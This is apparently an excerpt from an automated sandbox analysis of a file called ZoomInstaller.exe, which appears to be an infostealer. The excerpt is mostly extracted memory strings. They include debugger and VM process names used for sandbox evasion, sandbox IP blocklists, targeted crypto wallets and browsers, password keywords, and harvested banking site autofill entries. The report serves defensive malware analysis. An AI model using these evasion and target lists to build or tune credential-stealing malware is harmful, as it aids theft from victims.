MASTERHTTP_PROXYHTTP_PROXYHTTP2DEBUGCRYPTO/TLSRIPEMD-160DWMAPI.DLLISVALIDSIDLOCALALLOCOPENEVENTWOPENMUTEXWOPENTHREADPULSEEVENTRESETEVENTSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1BASE_NONCEPOSTALCODEAVX512IFMAAVX512VBMIAVX512VNNIAVX512GFNIAVX512VAESAVX512BF1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27FV-AZ269-80ARCHIBALDPCRUNNERADMINAAYRAP7XFUOWATCHER.EXEMITMWEB.EXECHARLES.EXEPOSTMAN.EXEFIDDLER.EXEOLLYDBG.EXEFIDDLER.EXEREGEDIT.EXETASKMGR.EXEVMUSRVC.EXEDF5SERV.EXEQEMU-GA.EXEOLLYDBG.EXEDISCORD.EXEUSER_DATA#2USER_DATA#3USER_DATA#4USER_DATA#5IDENTIFIANTYOROIWALLETKARDIACHAINNIFTYWALLETBRAVEWALLETEQUALWALLETGUILDWALLETMARSHALJSONMARSHALTEXTUNREACHABLE_AUTH_CRYPT_QUERY_ONLY_CACHE_SIZESHORT WRITESUBMISSIONSNIL CONTEXTI/O TIMEOUTHTTP2SERVERHTTP2CLIENTENABLE_PUSHEND_HEADERS/INDEX.HTML ERRCODE=%V, SETTINGS:RETRY-AFTERTTL EXPIREDEARLY HINTSBAD REQUESTBAD GATEWAY/DEV/STDOUT/DEV/STDERROPENPROCESSGETFILETYPE BYTES ...
    Source: ZoomInstaller.exeBinary or memory string: RUNTIME: SP=ABI MISMATCHWRONG TIMERSINVALID SLOTHOST IS DOWNILLEGAL SEEKGETLENGTHSIDGETLASTERRORGETSTDHANDLEGETTEMPPATHWLOADLIBRARYWREADCONSOLEWSETENDOFFILETRANSMITFILEGETADDRINFOWADVAPI32.DLLIPHLPAPI.DLLKERNEL32.DLLNETAPI32.DLL152587890625762939453125OPENSERVICEWREVERTTOSELFCREATEEVENTWGETCONSOLECPUNLOCKFILEEXVIRTUALQUERY HAS NO NAME HAS NO TYPEREFLECT.COPYCOMCTL32.DLLCOMDLG32.DLLCHOOSECOLORWCREATEBITMAPDELETEOBJECTEXTCREATEPENGETTEXTCOLORSELECTOBJECTSETTEXTCOLORGRADIENTFILLGLOBALUNLOCKLOADRESOURCELOCKRESOURCESETLASTERROROLEAUT32.DLLSYSSTRINGLENOPENGL32.DLLPDHOPENQUERYEXTRACTICONWENABLEWINDOWGETCURSORPOSPEEKMESSAGEWPOSTMESSAGEWREDRAWWINDOWSENDMESSAGEWSETCURSORPOSSETWINDOWPOSUPDATEWINDOWWINDOWFROMDCWINSPOOL.DRVRANDAUTOSEEDMIME-VERSIONX-IMFORWARDSX-POWERED-BYCONTENT TYPERCODESUCCESSRCODEREFUSEDNOT POLLABLETLSUNSAFEEKMCLOSE NOTIFYREMOTE ERRORC HS TRAFFICS HS TRAFFICC AP TRAFFICS AP TRAFFIC (SENSITIVE)GOTYPESALIASCFGMGR32.DLLSETUPAPI.DLLWINTRUST.DLLWTSAPI32.DLLREPORTEVENTWCREATEMUTEXWGETCOMMSTATEGETPROCESSIDRELEASEMUTEXRESUMETHREADSETCOMMBREAKSETCOMMSTATESETERRORMODESETSTDHANDLETHREAD32NEXTVIRTUALALLOCNTCREATEFILECOCREATEGUIDECDSA-SHA256ECDSA-SHA384ECDSA-SHA512CALLER ERRORSERIALNUMBERAVX5124FMAPSAVX512BITALG88.132.231.7152.251.116.35194.154.78.6920.99.160.173195.74.76.22234.105.183.6892.211.55.19979.104.209.3334.145.89.174109.74.154.90195.239.51.59192.40.57.23464.124.12.16234.142.74.220109.74.154.9134.105.72.241109.74.154.92213.33.142.5093.216.75.209192.87.28.10334.85.253.17023.128.248.4635.229.69.22734.141.245.2534.85.243.24187.166.50.21334.145.195.5835.192.93.10784.147.54.113W0FJUOVMCCP5AMITMPROXY.EXEWIRESHARK.EXEWIRESHARK.EXEPRL_TOOLS.EXEFILEZILLA.EXEENCRYPTED_KEYGUEST PROFILEBRAVE DEFAULTOPERA DEFAULTBLISK DEFAULTAUTHENTICATORHARMONYWALLET_BUSY_TIMEOUT_FOREIGN_KEYS_JOURNAL_MODE_LOCKING_MODEAUTH_USER_ADDLAME REFERRALSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAUTHORIZATIONCACHE-CONTROLLAST-MODIFIEDACCEPT-RANGESIF-NONE-MATCH[FRAMEHEADER INVALID BASE ACCEPT-RANGESAUTHORIZATIONCACHE-CONTROLCONTENT-RANGEIF-NONE-MATCHLAST-MODIFIEDFQDN TOO LONGSOCKS CONNECTRESET CONTENTLOOP DETECTEDFIELD NAME %Q IN HOST NAMEFINDFIRSTFILEWAKEABLESLEEPPROFMEMACTIVEPROFMEMFUTURETRACESTACKTABEXECRINTERNALTESTRINTERNALGC SWEEP WAITOUT OF MEMORY IS NIL, NOT VALUE METHOD BAD MAP STATE SPAN.BASE()=BAD FLUSHGEN , NOT POINTER != SWEEPGEN MB GLOBALS, WORK.NPROC= WORK.NWAIT= NSTACKROOTS= FLUSHEDWORK DOUBLE UNLOCK S.SPANCLASS= MB) WORKERS=MIN TOO LARGE-BYTE BLOCK (RUNTIME: VAL=RUNTIME: SEQ=FATAL ERROR: IDLETHREADS= SYSCALLTICK=LOAD64 FAILEDXADD64 FAILEDXCHG64 FAILEDNIL STACKBASE}
    Source: ZoomInstaller.exeBinary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2950Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2340Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2846Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1102Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3800Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 859Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2678Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 870Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6912Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
    Source: ZoomInstaller.exeBinary or memory string: sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=level 3 resetsrmount errortimer expiredexchange fullRegEnumKeyExWRegOpenKeyExWCertOpenStoreFindNextFileWMapViewOfFileVirtualUnlockWriteConsoleWFreeAddrInfoWgethostbynamegetservbynameparsing time out of range is too largenot availabledalTLDpSugct?3814697265625GetTempPath2WModule32NextWRtlGetVersionRegEnumValueWImageList_AddCreateRectRgnGetDeviceCapsSetBrushOrgExCreateActCtxWFindResourceWRtlMoveMemoryCoTaskMemFreeOleInitializeSysFreeStringwglShareListsPdhCloseQueryShellExecuteWAnimateWindowDestroyWindowDrawFocusRectGetClassNameWGetClientRectGetMenuItemIDGetScrollInfoGetSystemMenuGetWindowRectOpenClipboardSetScrollInfoGetThemeColorOpenThemeDataEnumPrintersWname too longtlsmaxrsasizeaccess denieduser canceledPKCS1WithSHA1ECDSAWithSHA1CLIENT_RANDOMgzip, deflategocacheverifyinstallgoroothtml/templateRegDeleteKeyWDeleteServiceStartServiceWGetDriveTypeWThread32FirstWaitCommEventRtlInitStringEnumProcessesExitWindowsExtimeEndPeriodWTSFreeMemoryinvalid ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSemail addressshared_secretempty integerunsupported: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228tVaUeNrRraoKwaVMware SVGA 3Dvmwareuser.exexenservice.exevmwaretray.exeChrome DefaultYandex DefaultCocCoc Defaultis a directory_secure_deleteunexpected EOFinternal errorgetprotobynameunknown mode: Content-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eofunknown error unknown code: Not AcceptableComputerNameEx
    Source: webdata.db.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
    Source: webdata.db.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
    Source: webdata.db.0.drBinary or memory string: discord.comVMware20,11696487552f
    Source: webdata.db.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
    Source: webdata.db.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
    Source: ZoomInstaller.exeBinary or memory string: SYSTEMROOT=assistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailunspecifiedcgocall nil s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCloseHandleCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32.dllshell32.dlluserenv.dlltime: file 30517578125ProcessPrngMoveFileExWNetShareAddNetShareDelbad argSizemethodargs(reflect.Set.WithCancel.WithValue(PrintDlgExWmsimg32.dllSwapBuffersgdiplus.dllGlobalAllocDestroyIconDestroyMenuDrawMenuBarDrawTextExWFindWindowWGetAncestorGetCaretPosGetIconInfoGetKeyStateGetMenuInfoGetMessageWGetSysColorLoadCursorWLoadStringWMessageBeepMessageBoxWSetMenuInfouxtheme.dllIsAppThemedIn-Reply-ToReturn-PathClassHESIODauthoritiesadditionalstls10servertls: alert(local errorc e traffictraffic updApplicationHTTPS_PROXYhttps_proxygocachehashgocachetestarchive/tarcrypto/x509archive/zipSHA-512/224SHA-512/256BLAKE2s-256BLAKE2b-256BLAKE2b-384BLAKE2b-512sechost.dllversion.dllGetFileTimeSetCommMaskVirtualFreeNetUserEnumCoGetObjectEnumWindowsToUnicodeExinvalid oidpsk_id_hashavx512vnniwavx512vbmi284.147.62.1295.25.204.9092.211.52.6234.138.96.2334.83.46.13035.237.47.12195.239.51.3AppOnFly-VPSPeter WilsonFX7767MOR6Q6RDhJ0CNFevzX8Nl0ColNQ5bqPqONjHVwexsSmitmdump.exeInsomnia.exeKsDumper.exevmacthlp.exevboxtray.exevmtoolsd.exeksdumper.exepestudio.exeTelegram.exemot_de_passeidentifiantsEdge DefaultBinanceChainGuardaWalletJaxxxLibertyTerraStationMartianAptosBitAppWalletAtomicWalletSaturnWalletTempleWalletwith name %q_auto_vacuum_synchronoussqlite_cryptauthenticateauth_enabledshort bufferinvalid baseContent-Typemultipathtcp127.0.0.1:53no such hostunknown portCIDR addressinvalid portgetaddrinfowcan't happentransmitfilehttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2out of range100-continuerecv_goaway_Multi-StatusNot ModifiedUnauthorizedI'm a teapotNot Extendedproxyconnectexit status sweepWaiterstraceStringsspanSetSpinemspanSpecialtraceTypeTabgcBitsArenasmheapSpecialgcpacertraceharddecommitmadvdontneeddumping heapchan receivelfstack.push span.limit= span.state=bad flushGen MB stacks, worker mode nDataRoots= nSpanRoots= wbuf1=<nil> wbuf2=<nil> gcscandone runtime: gp= found at *( s.elemsize= B (
    Source: webdata.db.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: global block list test formVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0002AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wOWvRqvwTqBZTLo9/oZ5KvXlPlByrz8dZOGGcQgucCWvqvNNT5O3VEcyTdt31cd6tZQHZiOzQcZC8E22ETZKkgudAP+oUn2G+KcQQbBErMtKVCZBX1tsjmSu2SuFLZCAqXhI9FKzFE906Z2Be2GpMiub+uyTB2beHZ83XMdHeNHIAN/4LMoDxZbf05vsAqlTzcMWZ5kn2EQvW8S382ZMJYjBW++Y1oatCZgYUqKp9u6TaNSIF2TEDvtQNfQGaUsS7L0JVKfbZGyWA+S5rE3OIx9oWGlORaMqS90h6xgIArp0pvuywtTd7hyCA1zsj5AzYXmAOlYkuN5JpKphnYFwV7y48/ITdP4M/PSOAzJ/HkaLJcsjdjnhQbDyaoUAa+FMRwoWhJBvMnzeLkMaVCYG1NaWHN/aSrkxVjgiuRb9tsS8Q4WhQcbkim7iMoyOZgJl5OYrQOnOTSVgGNwOB/E3uIC6RH4THKNpfamWGBHPLBt6Lhm3xM34g7ygXlCorNUKYPh8ZZ5braau967FwbeO5o1pHIsdubrKoaNNYEeMvcDymdblm2CC0Q5VXMkOQgYohlMadka/PhNe/MD3YKpEXhNQ4LhdYiADEA6OJjsMUXFJKIDUh4dyJpiEbehY8xIhAvThNKKRcv0Q3mFBaMYnhF4fO1h6ZMFsw1XStckRVu+LYDkoBAWriOp3mrhmjo9a+gZHWRMVWxqhmGkwPDYyjKMCw0Og3WVeEka+xsvn29TtmTfWbTJ0IYJkyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6nrkdzDfsQ7pfwBivJDdeBjyC8ZBrYMHeatMrX4SJ1l2vEDg/GZZwN3qvaQEOk1nsYI0nQhADMY/hZsIxYmq3ilFF3yHgGzY6tEzFmBea/UBzFhAmYb1oqHrA2HYnHoIDc0qDg5jN/iSm+UGwHYbQqqkRJVpdhCsWfEsDQs2YatlmgMvGsygRH9PIZM241n1Wg2QJriGdD15v8AEBGUz5wmlUAhSdeuRka5XGneIZTmGpDHsAMQJpeyqP8xYFGCRUAjTnqs8pnAw7ZfJaRM+v+EFLwrtaPnqkMBbgxavDBYWANPixOUg4B+VzjJUjJYCBsUJclzNAchyM4pexDM02OhsoxyzrVD0C6Arsg91oEjxRVPKLcNQkNKVbxTCUW6soC2egIZoCPA7t4NFXTGOgK4Ztqmq9iAIBoyJ0taxTdWMw6zUbRFVnX0UrMS8+qbjpa49lGwqehC3MjgPLqrkBUFpyDPwpFUfupRlk6QW9NIcWAwPgjCgxdK6okaC1DF0K1ohFZDl5jASmKR3itQzUXpUraHaACX6vQ/9XAsTV4DSBo7dk3QZrlT5uo4dswPOpnsJUzg7nmNYtWoEgESZWcUTH2xOwuFIKgJgfVnHTK+JLmAb/RowJPMKhAsCv3xIKp3A3J0bIrT6Kneikg7dvk+GJmkHFttaJEguSLSv129ueZxPU8u/jjbOh58SbK79gHC6fbyHtiXugGa2piEQXxG+bmG0Cus4t/nq2zXfIR5aooh8B19rBJQYmQ20FEfz4uFqfTRmf/+lM6Ex746uEtS7v0ouFUMm83c8HpZ5PQzRdxuv47EQAZ9PEP/ZL6ecyVbL+8hOSJm6+yF+1A6ySN83i+WdwHy5TP6AGa54yNOQDMt0K/OHXfg+kqThLIfk6QFsLDCjZdpZTGOzjUsCOwZe5C6Gi8Q8TVSedBLpSfsvQj8BDp18kmZ3ex54YP0+Gs0yuOc0oHyahpuklKSN9DNVuBZhWH/uMHS1PAuQ5a2Lju9F/SWeKm7prBc0jVP84iPJxdnHVJ/HDDDbXL54Z89qdU0Vcin6gqmwXrJjGgP4IA8IR19qewIwTnUCQdrTZp1GW0u9j1R6sUgPUrm2c5cvXl9oot3E2Yi+lA6TVxs+wzTv0RyoJlnAb/LVyrQ+JXXkt08JQiqZojt7zmAq6A6TMAI3d99XjZOb1H2Ej05cPkbrRi3jsQ/1cA/+FiEaSdYURoSjyCbui7SR58sFKCEAn3HKH4uwm3eDW6eeqSVnn3vRu5S+ZPUrZgKYs8lgl1/fYieGCfbdnVWn1in27qZ19Yfhv4WKpf3SAPgywfR4sYK3wdc8VGoHmK3TWFL5jmOUHB49Ogy2jYoedRvh3h9D96fGhUBv0WbVKW3Fxq4ViXVL2x9NKNgA+vC8A5zUncE8H2TafulfEOSRqFccYu86ht5uc0nLgpiCrzoulmnAYZLfk4zbvX51WQrYMsc8ORmzRWmqqLFXZVINxxVKaxrpheUhYRfRx54cZnzZZxdMOYT0VhpWbZdIcVFHnb3QBFJEgxwyQpCTte0yQjzn7uCUZsuA+iYIJO4a+Hmq+9ONtmOcMMYl7Tbktlw
    Source: webdata.db.0.drBinary or memory string: AMC password management pageVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
    Source: ZoomInstaller.exe, 00000000.00000002.2807697262.000002A254EEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: webdata.db.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
    Source: webdata.db.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
    Source: webdata.db.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
    Source: ZoomInstaller.exeBinary or memory string: runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptdnsapi.dllws2_32.dll%!Weekday(short read12207031256103515625ParseFloatLockFileExWSASocketWcomplex128t.Kind == CombineRgnGetBkColorGetObjectWSetBkColorStretchBltAlphaBlendGlobalFreeGlobalLockDragFinishBeginPaintCreateMenuDeleteMenuDrawIconExGetDlgItemGetSubMenuLoadImageWMoveWindowRemoveMenuSetCaptureShowWindowContent-IdMessage-IdParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: res binderres masterresumptionexp masterHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsRIPEMD-160dwmapi.dllIsValidSidLocalAllocOpenEventWOpenMutexWOpenThreadPulseEventResetEventSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27fv-az269-80ARCHIBALDPCrunneradminaAYRAp7xfuowatcher.exemitmweb.exeCharles.exePostman.exeFiddler.exeOllyDbg.exefiddler.exeregedit.exetaskmgr.exevmusrvc.exedf5serv.exeqemu-ga.exeollydbg.exediscord.exeuser_data#2user_data#3user_data#4user_data#5identifiantYoroiWalletKardiaChainNiftyWalletBraveWalletEqualWalletGuildWalletMarshalJSONMarshalTextunreachable_auth_crypt_query_only_cache_sizeshort writesubmissionsnil contexti/o timeouthttp2serverhttp2clientENABLE_PUSHEND_HEADERS/index.html ErrCode=%v, settings:retry-afterTTL expiredEarly HintsBad RequestBad Gateway/dev/stdout/dev/stderrOpenProcessGetFileType bytes ...
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
    Source: webdata.db.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
    Source: webdata.db.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
    Source: webdata.db.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
    Source: webdata.db.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
    Source: webdata.db.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
    Source: webdata.db.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
    Source: webdata.db.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
    Source: webdata.db.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
    Source: ZoomInstaller.exeBinary or memory string: Handshakemath/randwinmm.dllPurgeCommSetupComminfo_hashQ9IATRKPRHQarZhrdBpjd1bnJkfVlHPxmdUOpVyxx64dbg.exex96dbg.exevmsrvc.exex32dbg.exeprl_cc.exechrome.exemsedge.exemotdepassepassphrasesauvegardeMathWalletEVERWalletPetraAptosFewchaMovePaliWalletMetamask_EMetaMask_O for type user32.dll2006-01-02_auth_user_auth_pass_auth_saltimpossible
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0002AA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 